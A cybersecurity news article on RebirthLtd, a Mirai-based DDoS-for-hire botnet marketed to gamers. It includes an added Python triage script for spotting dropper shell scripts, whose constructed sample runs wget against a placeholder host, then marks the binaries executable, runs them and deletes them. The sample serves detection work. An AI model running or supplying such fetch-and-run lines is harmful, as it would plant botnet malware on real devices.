Tuesday, June 25, 2024

DDoS-as-a-Service Botnet Backed by Mirai Attacking Gaming Community

DDoS-as-a-Service botnets let attackers launch devastating distributed denial-of-service (DDoS) attacks as easily and cheaply as possible.

These botnets are built from compromised devices that can be rented or leased to cause service disruptions or outages by flooding targets with high volumes of traffic.

DDoS-as-a-Service makes it much easier for attackers to extort businesses, harm others, and remain anonymous.

Cybersecurity researchers at the Sysdig Threat Research Team (TRT) recently discovered a Mirai-based DDoS-as-a-Service botnet attacking the gaming community.

DDoS-as-a-Service Botnet

In March 2024, the Sysdig Threat Research Team discovered that the “rebirthltd.com” domain was involved in a financially motivated and growing DDoS-as-a-Service botnet based on the Mirai malware.


This service, advertised via Telegram or an online shop, focuses mostly on the gaming community but also introduces risks for corporate entities. 

The threat actors operating this Mirai-derived botnet use compromised devices to launch massive distributed denial-of-service attacks sold to buyers, offering a glimpse into the evolving market for cybercrime services that can stall business activities.

RebirthLtd’s botnet is built on the Mirai malware, delivers DDoS-as-a-Service, and is marketed as a subscription accessible through an online store and a Telegram channel.

It is aimed mainly at gamers, among them video game streamers and so-called “trolls” who disrupt the whole gameplay process.

Operating under several hacking groups, some of which are claimed to be part of this ring, including CazzG, supposedly a Chinese administrator, it represents an emerging illicit ecosystem that promotes the illegal sale of bots and DDoS tools through anonymity and easy access.

The origins of the RebirthLtd DDoS botnet can be traced to previous malware families and campaigns. Investigations link it to shop4youv2.de (Mirai-based and connected to the FBI’s Operation PowerOFF) and Tsuki. army (which advertised a second network of bots).

Docx69 on TikTok under the moniker ‘prixnuke’ (Source – Sysdig)

Preliminary analysis from 2020 showed that “Rebirth” or “Vulcan” was an IoT-oriented botnet built on Gafgyt, QBot, and STDBot and armed with known exploits.

While the initial campaigns probably involved only the botnet’s developers, since August 2022 RebirthLtd has moved to a commercialized DDoS-as-a-Service model, offering its malicious capabilities to a wider range of customers.

This change is proof that threat actors continuously repackage and sell malware strains.

An investigation of the RebirthLtd DDoS botnet revealed that it evolved from previous malware variants such as Rebirth/Vulcan, with which it shares code similarities and common infrastructure, including the domains yosh[.]ltd and blkyosh[.]com.

Though the first campaigns in 2019-2020 must have largely involved its developers, multiple countries have recently been hit with massive attacks.

The payloads consist of malicious bash scripts that attempt to download and execute architecture-specific ELF files, sometimes named after vulnerabilities or services.
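As an added example (not from the article or Sysdig’s report), a small static triage check that flags the multi-architecture download-then-execute pattern described above in a shell script; the sample scripts, domain names and file names below are constructed, and the architecture list and regexes are assumptions.

```python
import re

# Architecture names that multi-arch droppers typically iterate over (assumed list).
ARCH_TOKENS = ("x86", "x86_64", "i686", "arm", "arm5", "arm6", "arm7",
               "mips", "mipsel", "mpsl", "ppc", "sh4", "m68k", "spc")
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")
EXEC_RE = re.compile(r"(^|[;&|]\s*)\./[\w.-]+")   # ./file run as a command
CLEANUP_RE = re.compile(r"\brm\s+-[rf]+\s")          # dropped file deleted afterwards

def assess_dropper(script: str) -> dict:
    """Count dropper indicators in a shell script and flag the multi-arch pattern."""
    arches, downloads, chmods, execs, cleanups = set(), 0, 0, 0, 0
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if DOWNLOAD_RE.search(line):
            downloads += 1
            for tok in ARCH_TOKENS:          # URL or file name ends in an arch name
                if re.search(rf"[/._-]{tok}\b", line):
                    arches.add(tok)
        chmods += bool(CHMOD_RE.search(line))
        execs += bool(EXEC_RE.search(line))
        cleanups += bool(CLEANUP_RE.search(line))
    # Download -> chmod -> execute fanned out over two or more architectures is
    # the signature described in the article; a single download alone is not.
    suspicious = len(arches) >= 2 and downloads > 0 and (chmods > 0 or execs > 0)
    return {"arches": sorted(arches), "downloads": downloads, "chmods": chmods,
            "execs": execs, "cleanups": cleanups, "suspicious": suspicious}

# Constructed sample in the style the article describes (reserved invalid TLD, not real).
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
wget http://dropper.example.invalid/bins/x86 -O x86; chmod +x x86; ./x86; rm -rf x86
wget http://dropper.example.invalid/bins/mips -O mips; chmod +x mips; ./mips; rm -rf mips
wget http://dropper.example.invalid/bins/arm7 -O arm7; chmod +x arm7; ./arm7; rm -rf arm7
"""
# Constructed benign installer: one download, no architecture fan-out.
SAMPLE_INSTALLER = """#!/bin/sh
curl -fsSL https://example.invalid/install.sh -o /tmp/install.sh
sh /tmp/install.sh
"""

if __name__ == "__main__":
    for name, text in (("dropper", SAMPLE_DROPPER), ("installer", SAMPLE_INSTALLER)):
        print(name, assess_dropper(text))
```

The check is a triage heuristic for scripts pulled from honeypots or web logs, not a replacement for sandboxing the downloaded ELF files.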

The release of Mirai’s source code fueled a botnet industry and threats like Rebirth, reinforcing the need for diligent vulnerability management and runtime threat detection.



Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.
